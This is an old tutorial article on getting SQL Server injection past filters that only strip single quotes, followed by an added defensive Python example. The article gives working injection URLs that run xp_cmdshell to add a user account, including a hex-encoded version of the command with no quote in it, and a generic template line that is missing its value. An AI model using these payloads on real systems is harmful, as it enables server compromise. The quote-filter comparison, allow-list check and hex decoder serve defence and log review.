Bypassing the ' (single quote) restriction and continuing to inject

xiaoxiao2021-03-06  76

Author: angel. Article type: Original. Release date: 2004-04-02

I think many people have seen articles about SQL injection attacks against SQL Server. In every case a malformed SQL statement is constructed and injected because variables are filtered inadequately or not at all. The "SQL Injection" article is also such an example: because there is no filtering, injection is quite easy, as follows:

http://www.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--

This often leads people to a misunderstanding: they think that filtering ' out of variables is enough to prevent SQL injection attacks. This belief is the root of the disaster that a large number of programs can be injected. In fact, filtering ' is not enough. With ' filtered we can still play; look at the following statement:

http://www.ilikeplmm.com/show.asp?id=1;declare @a sysname select @a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 exec master.dbo.xp_cmdshell @a;--

Isn't it very different from the statement above? However, the effect is exactly the same. In fact, both are just SQL statements.

0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400

This value is the hexadecimal form of "net user angel pass /add". Readers who know SQL will easily understand it: first declare a variable a, then assign our command to a, then pass the variable a to xp_cmdshell so that the command we entered is finally executed. Variable a can hold any command, as follows:

declare @a sysname select @a= exec master.dbo.xp_cmdshell @a

Solution: filter variables so that only specific characters are allowed. For example, for variables of a numeric type, accept only numeric data. I won't go into the details; this is left entirely to the program's author.
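The point above as an added example (not part of the original article): a filter that only strips ' leaves the article's quote-free payload untouched, while an allow-list check for a numeric id rejects it. The function names are hypothetical, and decode_hex_literals is an added log-review helper that shows what a 0x literal in a logged parameter hides.

```python
import re

# The id value from the article's second URL (everything after "id=").
# It contains no single quote at all.
SAMPLE_ID = (
    "1;declare @a sysname select @a="
    "0x6e006500740020007500730065007200200061006e00670065006c00"
    "2000700061007300730020002f00610064006400 "
    "exec master.dbo.xp_cmdshell @a;--"
)


def quote_filter(value: str) -> str:
    """The insufficient defence: remove single quotes and nothing else."""
    return value.replace("'", "")


def parse_numeric_id(value: str) -> int:
    """Allow-list check for a numeric parameter: 1-10 ASCII digits only.

    [0-9] is used instead of \\d so Unicode digits are rejected too.
    """
    if not re.fullmatch(r"[0-9]{1,10}", value):
        raise ValueError("id must consist of 1-10 ASCII digits")
    return int(value)


# A 0x literal of at least 4 bytes, as it would appear in a logged parameter.
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2}){4,})")


def decode_hex_literals(value: str) -> list[str]:
    """Decode 0x... literals as UTF-16LE text, the encoding SQL Server
    uses for sysname/nvarchar, so a reviewer can read the hidden string."""
    decoded = []
    for match in HEX_LITERAL.finditer(value):
        raw = bytes.fromhex(match.group(1))
        if len(raw) % 2 == 0:  # UTF-16 needs an even number of bytes
            decoded.append(raw.decode("utf-16-le", errors="replace"))
    return decoded


if __name__ == "__main__":
    print("after quote filter unchanged:", quote_filter(SAMPLE_ID) == SAMPLE_ID)
    print("hidden text:", decode_hex_literals(SAMPLE_ID))
```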
